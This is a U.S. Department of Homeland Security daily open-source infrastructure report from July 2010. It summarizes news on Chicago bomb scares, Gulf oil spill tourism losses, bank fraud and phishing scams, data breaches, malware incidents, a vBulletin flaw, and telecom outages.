Department of Homeland Security Daily Open Source Infrastructure Report

Monday, July 26, 2010

Complete DHS Daily Report for July 26, 2010

Daily Report

Top Stories

• According to WBBM, a suspicious package left at the front door of the Planned Parenthood Center on North La Salle Drive July 22 was one of four incidents that took place in less than 24 hours in Chicago. Other incidents included: Suspicious material found inside a clerk’s office in the Dirksen Federal Building; a suspicious cylinder found at a bus shelter at Columbus and North Water; and a suspicious package discovered on North Wells.

31. July 22, WBBM Chicago – (Illinois) Authorities investigate string of bomb scares. A suspicious package was left at the front door of the Planned Parenthood Center on North La Salle Drive in Chicago July 22. “This is for all the doctors and what you do for women,” a note said. Inside the box was a newspaper and a dead possum. On July 3, a package with the same message was left in a planter outside Family Planning Associates Medical Group on North Elston. That box had a dead skunk in it. What happened at Planned Parenthood was just one of four similar incidents that took place in less than 24 hours in Chicago. The fire department was called to the Dirksen Federal Building, where suspicious material was found in an envelope inside a clerk’s office on the 20th floor. It was determined not to be a threat. Also, overnight, officers found a suspicious cylinder at a bus shelter at Columbus and North Water. A bomb and arson robot was used to check it out, and the cylinder was blown up. A suspicious package was also discovered on North Wells in Old Town July 21. That package turned out to be a radio speaker in a box. Planned Parenthood has several surveillance cameras outside their building. The organization has given the tape to law enforcement. Source:

37. July 22, WBBM 2 Chicago – (Illinois) Suspicious items found at Dirksen federal building. Unidentified suspicious material was discovered in an envelope at the Dirksen Federal Building in Chicago July 22. The material has since been deemed safe. The fire department called a level 1 hazardous materials response for the items, which were found on the 20th floor of the federal courthouse at 219 S. Dearborn St. sometime shortly after 10 a.m. The 20th floor houses courtrooms, as well as judges’ and clerks’ offices. Sources tell CBS 2 an envelope with a suspicious substance was found in a clerk’s office. The situation was secured at 10:55 a.m. and the envelope was deemed safe. It has not yet been learned exactly what the substance was. Fire trucks were seen pulling up outside the courthouse. Many high-profile court cases and trials are underway in the building, including that of the deposed former Illinois governor. The building was not evacuated. Source:

54. July 22, NBC Chicago – (Illinois) Bomb scare evacuates NBC Tower. NBC Tower in Chicago was evacuated early July 22 after police received a call reporting a suspicious cardboard canister inside the bus shelter at the corner of North Water and Columbus Drive. The shelter is located at the front of the tower’s Columbus entrance. The Chicago Police Bomb and Arson Squad ordered guests of the Sheraton Hotel to stay put and evacuated NBC. The squad then used two robots to determine whether the package was a bomb. “A short time later, a loud explosion sound alerted onlookers. The box was detonated and the scene was rendered safe,” said a police news affairs officer. The suspicious package was one of two reported in the last 24 hours. Another call came in at 8:50 p.m. reporting a package in the Old Town neighborhood. Police found a package in a building in the 1500 block of North Wells Street. Bomb and arson investigators determined the package contained a radio speaker. Source:

• Reuters reports that the tourism industry in the Gulf of Mexico could suffer for up to three years with $22.7 billion in lost revenue because of the largest oil spill in U.S. history, the U.S. Travel Association said July 22.

55. July 22, Reuters – (National) Gulf tourism may lose $22.7 billion to oil spill. The tourism industry in the Gulf of Mexico could suffer for up to three years with $22.7 billion in lost revenue because of the largest oil spill in U.S. history, the U.S. Travel Association said July 22. The study projected the impact of the BP oil spill on travel to the five Gulf Coast states — Florida, Louisiana, Mississippi, Alabama and Texas. Oil fears have sparked a double-digit drop in plans for travel to the region, even in parts of Florida where oil has not yet washed ashore. The association proposed a 10-point “Roadmap to Recovery” plan for the government to help communities hit by the oil spill by informing the public, and adding incentives to travel to the affected areas. The plan includes the creation of a $500-million marketing program, to be funded by BP, to share accurate information on the oil spill and attract visitors. It also calls for setting up an online system where travelers could get current information about which areas are open for travel and business. Source:


Banking and Finance Sector

10. July 23, WHDH 7 Boston – (Massachusetts) ‘Backstreet Bandit’ sought in bank robberies. The FBI is asking for help in tracking down suspect in several bank robberies in Massachusetts known as the “Backstreet Bandit.” He has been spotted wearing a fedora-style hat and flashy clothes similar to a member of pop group the Backstreet Boys. In all the robberies, he has allegedly handed the teller a manila envelope, and then demanded money. The suspect was caught on surveillance camera allegedly robbing three banks in Malden, Revere and Saugus since June. The most recent crime happened July 19. Source:

11. July 23, WIVB 4 Buffalo – (National) Five indicted for bank fraud conspiracy. Five people have been in indicted for bank fraud conspiracy that spanned from July 2009 until December 2009. A federal grand jury in Buffalo, New York has returned a four-count indictment charging the five suspects, all residing in New York or Florida, with conspiracy to commit bank fraud. The five are also charged with production and use of counterfeit-access devices, possession of device-making equipment and aggravated identity theft. The charges carry a mandatory minimum penalty of two years in prison and a maximum of 30 years, a fine of $1 million or both. An assistant U.S. attorney said, they fraudulently obtained the credit and debit account numbers of hundreds of individual bank customers, used those account numbers to produce hundreds of counterfeit credit and debit cards, and then used those counterfeit cards to fraudulently cash from ATMs. Those cash machines were located at the Seneca Niagara Casino, the Seneca Allegany Casino, the Salamanca Bingo Hall and various other casinos located throughout the country. In total, the defendants, and other co-conspirators withdrew a total of $510,500 using the counterfeit cards. Source:

12. July 22, DarkReading – (National) Tokens a tempting option for securing cardholder data. As merchants and credit-card processors continue to struggle with securing cardholder data for the sake of PCI compliance and overall brand protection, many are increasingly turning to tokenization technology as a way to reduce the scope of risks. But vendors in the burgeoning market are still skirmishing over technology definitions and standards. Meanwhile, Visa recently released a best-practices guide to relieve confusion about tokenization and help merchants, processors, acquirers, and others in the payment ecosystem understand how to comply with PCI via tokenization. Tokenization is used to replace live cardholder personal account numbers (PANs) in databases with stand-in values that are meaningless to data thieves, but can be cross-referenced to real data if necessary. Compared to full encryption products, tokenization is often much easier to deploy and is less likely to disrupt applications that tap into databases for customer information. With the allure of easier deployment and smoother interaction with applications, tokenization’s biggest draw is the fact it can dramatically reduce the need for costly PCI audits. An analyst for Forrester Research calls the complete elimination of cardholder data from merchant databases the “Holy Grail” of PCI — and something that can be accomplished if merchants transfer risk to card processors, which are increasingly teaming up with tokenization vendors or developing home-grown technology to offer encryption and tokenization services. Source:

13. July 22, Chicago Southtown Star – (Illinois) Feds crack $35M mortgage fraud scheme. A south Chicago man is among seven people indicted July 22 in an alleged $35-million mortgage fraud scheme involving more than 120 residential properties, most on the South Side. The suspect of South Holland allegedly bought and sold homes, recruiting others to act as purchasers, costing lenders and financial institutions at least $16 million in losses on mortgage loans that were not repaid or fully recovered through foreclosure, according to a release from the U.S. Attorney’s office. Also indicted, according to the release, were six other suspects. The main suspect, 44-years-old, who operated various businesses including a property-renovation company called Jireh Development in South Holland, was arrested July 20 by FBI agents and U.S. Postal Service inspectors. He was charged with mail, wire and bank fraud in an 18-count indictment returned by a federal grand jury last week and unsealed following his arrest. The six other defendants are each charged with one or more counts of fraud in the same incident. They are scheduled for arraignment at 11 a.m. July 27. The scheme allegedly ran between June 2004 and May 2008. According to the indictment, the defendants provided false real estate loan applications and supporting documents to banks and lenders on behalf of prospective purchasers, knowing the individuals, whom they had recruited, could not or did not intend to fully repay. The main suspect and the others referred and recruited individuals to buy homes by promising they would not have to use any of their own money for down payments or deposits, and would be paid to act as purchasers and attend closings. They were also told they would not have to make any payments on the mortgages and that the homes were ready for occupancy or renovation, the release said. Source:,072210-mortgagefraud.article

14. July 22, Bellingham Herald – (Washington) Text message scam targets North Coast Credit Union users. Bellingham, Washington police are warning the public about a text message scam targeting North Coast Credit Union account holders who are also Nextel phone subscribers. The text messages went out sometime late July 21 said a spokesman for the Bellingham Police Department. The messages tell account holders that their accounts have been compromised and direct them to call a certain phone number. When they do, they are asked for their 16-digit card number, plus PIN. North Coast Credit Union received more than 100 calls from account holders July 22 asking whether the text messages were real or a scam, said the credit union’s senior vice president and chief operations officer. Only one person so far was known to have entered their personal account information through the scam phone number. That person did not lose any money because the credit union canceled the card. Source:

Information Technology

43. July 23, Sophos – (International) Hell Pizza security breach: I’ll have extra passwords with that. Hell Pizza, a popular chain of pizza restaurants in New Zealand with other branches around the world, has found itself in the embarrassing situation of having to admit that a hacker appears to have stolen a large portion of their customer database. According to Risky.Biz, more than one hacker has accessed Hell Pizza’s poorly secured 400MB database, which has 230,000 entries containing full names and addresses, phone numbers, e-mail addresses and passwords. Hell Pizza has posted a letter to customers on its Facebook page about the incident. Some customers have noted with curiosity that Hell Pizza has posted the communication as a graphical image rather than plain text, which would have helped the news be found by search engines and indexed across the Internet. Source:

44. July 23, The Register – (International) Dell blames staff for malware infection. Dell said human error was to blame for mistakes which led it to ship a number of replacement server motherboards to customers pre-loaded with spyware. The company declined to say whether it was running anti-virus software at its factory but said it had taken 16 steps to improve processes. The infection hit replacement PowerEdge 310, 410, 510 and T410 boards. The direct seller said less than 1 percent of boards were affected, and complete new server systems were safe. Dell is still not admitting how the W32.Spybot worm got into its systems and onto its hardware. A Dell spokesman said the problem was worldwide, but all infected motherboards had now been removed from the supply chain and it was already shipping clean boards. He said the spyware would only infect people running unpatched versions of Windows without any anti-virus software. Source:

45. July 23, The New New Internet – (International) Hacker enlists other unwitting hackers in scam. Skilled malware writers have found a way for less experienced cyber criminals to do their work for them. A new freeware phishing kit being offered in hacker forums offers a way to set up fake Web sites and spam e-mails to capture users’ legitimate log-in credentials. However, the malware writers are able to siphon off a significant portion of entered logi-n credentials, leaving only a few for the cyber criminals employing the phishing kit. This allows writers to capture the information without having to do the tedious work of setting up spam campaigns. The kit appears to have been developed in Algeria and had Arabic-language tutorials but operates in English, according to Imperva, a database-security company. “Unlike previous phishing kits available for years, this new approach lives in the cloud and relies on hackers exploiting other hackers,” according to a blog post by Imperva. “And with the new cloud-based approach the infrastructure for this phishing kit never goes away. Why? In traditional schemes when you take down a server you take down not only the web page but also the back end data collection capability. In this cloud version, data collection is hosted separately from the phishing web sites which means hackers only need to repost the web front end in a new location to be back in business.” Source:

46. July 23, The H Security – (International) vBulletin divulges MySQL login. A critical security vulnerability in the widely used forum software vBulletin allows attackers to easily gain access to any MySQL server running a forum. As a number of blogs report, if the term “database” is entered into the FAQ module’s search box, the module hands over confidential data on a silver platter. The flaw gives attackers power over the forum’s entire database, including access to personal forum user data. The vendor said that version 3.8.6 of the software is vulnerable. A patch has already been made available. In a brief Google search, The H’s associates at heise Security found countless vulnerable sites that were open to attack. Source:

47. July 22, IDG News Service – (International) Virus writers are picking up new Microsoft attack. The Windows attack used by a recently discovered worm is being picked up by other virus writers and will soon become much more widespread, according to security vendor Eset. Eset reported July 22 that two new families of malicious software have popped up, both of which exploit a vulnerability in the way Windows processes .link files, used to provide shortcuts to other files on the system. The vulnerability was first exploited by the Stuxnet worm, discovered on computer systems in Iran last month. The highly sophisticated, Stuxnet, targets systems running Siemens industrial-control, system-management software. The worm steals SCADA (supervisory control and data acquisition) project files from Siemens’ computer systems. The newly discovered malware is “far less sophisticated” than Stuxnet and “suggests bottom feeders seizing on techniques developed by others,” said a Eset researcher writing in a blog post. One of the new samples installs a keystroke logger, a tool hackers use to steal passwords and other data, on the victim’s computer. “The server used to deliver the components used in this attack is presently located in the U.S., but the IP is assigned to a customer in China,” he said. The other variant could be used to install one of several different pieces of malicious software. Source:

48. July 22, DarkReading – (International) Microsoft launches ‘coordinated’ vulnerability disclosure program. Microsoft July 22 revealed a new, modified approach to how it works with security researchers and handles vulnerability disclosures, including working with researchers to publicly release vulnerability details of a zero-day flaw when attacks are under way. The director of Microsoft Security Response Center said Microsoft is now promoting “coordinated vulnerability disclosure” (CVD) and moving toward working more closely with researchers in coordinating the release of details on new, unpatched bugs. The director said the term “responsible disclosure” had become too emotionally charged and it was time for a shift in philosophy. If active attacks are exploiting an unpatched flaw, then it makes sense to alert users about the bug. But Microsoft has not changed its stance against full disclosure, where a bug finder releases details of a flaw without the vendor getting a shot at patching it first. The director said Microsoft is, however, willing to work with researchers who go that route to work on a fix for the flaws they reveal publicly. Source:

Communications Sector

49. July 22, Reuters – (International) Baidu may press claims over hackers: U.S. judge. China’s leading search engine, Baidu Inc, can sue its U.S.-based domain name service provider, Inc, for breach of contract, gross negligence and recklessness related to an attack by hackers, a U.S. judge ruled July 22. The order in federal court in New York allows Baidu to proceed with a lawsuit filed in January. The January 11 attack prevented Internet users around the world from gaining access to Baidu for 5 hours and disrupted its operations for 2 days, according to the lawsuit. Baidu holds the greatest share of the Chinese online search market. Hackers calling themselves the Iranian Cyber Army hijacked Baidu’s home page by gaining unauthorized access to Baidu’s account at Register. Weeks before, the same hackers claimed to do the same thing to popular microblogging site Twitter. Baidu alleged a service representative allowed an intruder, who falsely claimed to be an agent of Baidu, access to Baidu’s account even though the intruder provided non-matching security codes. Source:

50. July 22, Santa Maria Times – (California) Cut cable disrupts local phone service. A tree trimming crew accidentally cut a fiber optic cable that ran between Solvang and Goleta, California July 22, disrupting phone, cell phone, and Internet service to more than 8,000 customers, including that of Lompoc Valley Medical Center. A Verizon media relations manager said the severed line disrupted his company’s service between 8 and 11:25 a.m., “primarily around the Santa Maria and Solvang area.” Other telecommunication companies in the Lompoc area besides Verizon were also affected by the line cut. T-Mobile phone customers reported service problems. The “main trunk line” of the Lompoc Valley Medical Center was also affected by the outage, according to its chief information officer. The crucial lines, including the hospital’s main number and the emergency number, were rerouted to a secondary phone service that remained active. City halls in Solvang and Lompoc were affected by the outage. Employees for the city of Santa Maria and the Santa Barbara County Sheriff’s Department reported no widespread disruption to their phones or Internet connections. Source: